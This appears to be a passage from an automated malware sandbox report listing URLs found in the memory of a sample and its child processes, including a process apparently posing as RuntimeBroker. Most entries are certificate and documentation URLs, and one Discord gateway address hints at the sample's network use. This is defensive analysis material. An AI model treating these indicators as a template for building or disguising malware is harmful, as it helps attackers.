0000000F.00000003.2016242056.0000019333660000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1785189670.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1802145844.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1787224261.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1801258378.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1784977486.0000019333653000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1795828971.000001470369D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: based.exe, 00000010.00000003.1794117542.0000014703690000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: based.exe, 00000010.00000003.1794117542.0000014703690000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: based.exe, 00000010.00000003.1794117542.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792313595.0000014703690000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: RuntimeBroker.exe, 00000005.00000002.1842561126.0000024CBA21D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1722902677.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1793017250.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1790100836.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1786865207.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1787585583.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.2016242056.0000019333660000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1785189670.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1802145844.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1787224261.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1801258378.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1790100836.000001933365F000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1784977486.0000019333653000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1795828971.000001470369D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1789036690.000001470369D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792758623.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1789487671.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1788541855.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1789036690.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1788297799.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1795828971.0000014703690000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: based.exe, 00000010.00000003.1792313595.000001470369D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792313595.0000014703690000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: RuntimeBroker.exe, 00000005.00000003.1724092395.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1726502247.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1726386604.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1724273440.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1725852419.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1723805692.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1725041975.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1723983433.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1722902677.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1793017250.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1790100836.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1786865207.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1787585583.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1785189670.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1802145844.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1787224261.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1801258378.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1790100836.000001933365F000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1784977486.0000019333653000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792758623.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1789487671.0000014703690000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: based.exe, 00000010.00000003.1787045088.0000014703690000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SH
Source: RuntimeBroker.exe, 00000005.00000003.1724092395.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1726502247.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1726386604.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1725852419.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000002.1842561126.0000024CBA21D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1725041975.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1722902677.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1793017250.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1790100836.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1786865207.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1787585583.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1785189670.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1802145844.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1787224261.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1801258378.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1784977486.0000019333653000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792758623.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1789487671.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1788541855.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1789036690.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1788297799.0000014703690000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: based.exe, 00000010.00000003.1787667879.0000014703690000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: based.exe, 00000010.00000003.1792313595.000001470369D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792313595.0000014703690000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: based.exe, 00000010.00000003.1792313595.000001470369D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792313595.0000014703690000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: RuntimeBroker.exe, 00000005.00000003.1724092395.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1726502247.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1726386604.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1724273440.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1725852419.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1723805692.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1725041975.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1723983433.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1722902677.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1793017250.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1790100836.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1786865207.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1787585583.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1785189670.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1802145844.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1787224261.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1801258378.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1790100836.000001933365F000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1784977486.0000019333653000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792758623.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1789487671.0000014703690000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: based.exe, 00000010.00000003.1792313595.000001470369D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792313595.0000014703690000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: based.exe, 00000010.00000003.1794117542.0000014703690000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: based.exe, 00000011.00000003.1818177199.000002A15D874000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
Source: RuntimeBroker2.0.exe, 00000006.00000002.1984341660.00000222000B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://gateway.discord.gg
Source: based.exe, 00000011.00000003.1977794400.000002A15DD06000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910540479.000002A15DD06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/
Source: based.exe, 00000011.00000003.1961012527.000002A15DC8A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1864241622.000002A15DC8A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1994709464.000002A15DC8A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910540479.000002A15DC8A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
Source: powershell.exe, 00000001.00000002.2426500786.000001F5CC9A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2426500786.000001F5CC861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1795294245.000001F5BE0CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: based.exe, 00000010.00000003.1794117542.0000014703690000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: based.exe, 00000010.00000003.1792758623.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1789487671.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1788541855.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1789036690.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1788297799.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1795828971.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792455105.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1787278172.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1791641274.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1789808002.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1797061856.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1790168550.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1796054596.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1787045088.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1787667879.0000014703690000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: RuntimeBroker.exe, 00000005.00000003.1724092395.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1726502247.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1726386604.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1724273440.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1725852419.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1723805692.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000002.1842561126.0000024CBA21D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1725041975.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1723983433.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1722902677.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1793017250.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1790100836.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1786865207.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1787585583.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.2016242056.0000019333660000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1785189670.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1802145844.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1787224261.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1801258378.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1784977486.0000019333653000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1795828971.000001470369D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: RuntimeBroker.exe, 00000005.00000002.1842561126.0000024CBA21D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1722902677.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1793017250.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1790100836.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1786865207.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1787585583.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.2016242056.0000019333660000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1785189670.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1802145844.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1787224261.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1801258378.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1790100836.000001933365F000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1784977486.0000019333653000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792313595.000001470369D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1795828971.000001470369D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1789036690.000001470369D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792758623.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1789487671.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1788541855.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1789036690.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1788297799.0000014703690000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: based.exe, 00000010.00000003.1792313595.000001470369D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792313595.0000014703690000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0N
Source: RuntimeBroker.exe, 00000005.00000003.1724092395.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1726502247.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1726386604.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000002.1842561126.0000024CBA21D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1725041975.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1722902677.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1793017250.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1790100836.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1786865207.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1787585583.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1785189670.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1802145844.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1787224261.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1801258378.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1784977486.0000019333653000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1789487671.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1788541855.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1789036690.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1788297799.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1795828971.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792455105.0000014703690000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: based.exe, 00000010.00000003.1792758623.0000014703690000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0shtable_get
Source: based.exe, 00000010.00000003.1792758623.0000014703690000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0shtable_get_Py_hashtable_hash_ptr_Py_hashtable_new_Py_hashtable_new_full_Py
Source: based.exe, 00000010.00000003.1794117542.0000014703690000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: based.exe, 00000010.00000003.1794117542.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792313595.0000014703690000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.thawte.com0
Source: powershell.exe, 00000003.00000002.1806725015.0000019AAB29B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: based.exe, 00000010.00000003.1794117542.0000014703690000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: based.exe, 00000010.00000003.1794117542.0000014703690000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.symcd.com06
Source: powershell.exe, 00000003.00000002.1806725015.0000019AAB29B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000001.00000002.1795294245.000001F5BC7F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1806725015.0000019AAB071000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker2.0.exe, 00000006.00000002.1984341660.0000022200001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.1806725015.0000019AAB29B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: based.exe, 00000010.00000003.1794117542.0000014703690000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: based.exe, 00000010.00000003.1794117542.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792313595.0000014703690000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: based.exe, 00000010.00000003.1794117542.0000014703690000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: based.exe, 00000010.00000003.1794117542.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792313595.0000014703690000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: based.exe, 00000010.00000003.1794117542.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792313595.0000014703690000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: based.exe, 00000010.00000003.1794117542.0000014703690000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: powershell.exe, 00000001.00000002.1795294245.000001F5BDE82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000003.00000002.1806725015.0000019AAB29B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: RuntimeBroker.exe, 00000005.00000003.1724092395.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1726502247.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1726386604.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1724273440.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1725852419.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1723805692.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1725041975.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1723983433.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1722902677.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1793017250.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1790100836.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1786865207.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1787585583.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1785189670.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1802145844.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1787224261.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1801258378.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1790100836.000001933365F000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1784977486.0000019333653000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792758623.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1789487671.0000014703690000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: 87Bym0x4Fy.exe, 00000000.00000002.1723649047.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker2.0.exe, 00000006.00000000.1716966909.000002227B642000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.google.com/maps/place/
Source: based.exe, 00000011.00000003.1961012527.000002A15DC8A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1864241622.000002A15DC8A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1994709464.000002A15DC8A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910540479.000002A15DC8A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
Source: powershell.exe, 00000001.00000002.1795294245.000001F5BC7F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1806725015.0000019AAB071000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000001.00000002.1795294245.000001F5BE0CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.1795294245.000001F5BE0CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.1795294245.000001F5BE0CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: based.exe, 00000010.00000003.1794117542.0000014703690000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: based.exe, 00000010.00000003.1794117542.0000014703690000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0
Source: based.exe, 00000010.00000003.1794117542.0000014703690000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0.
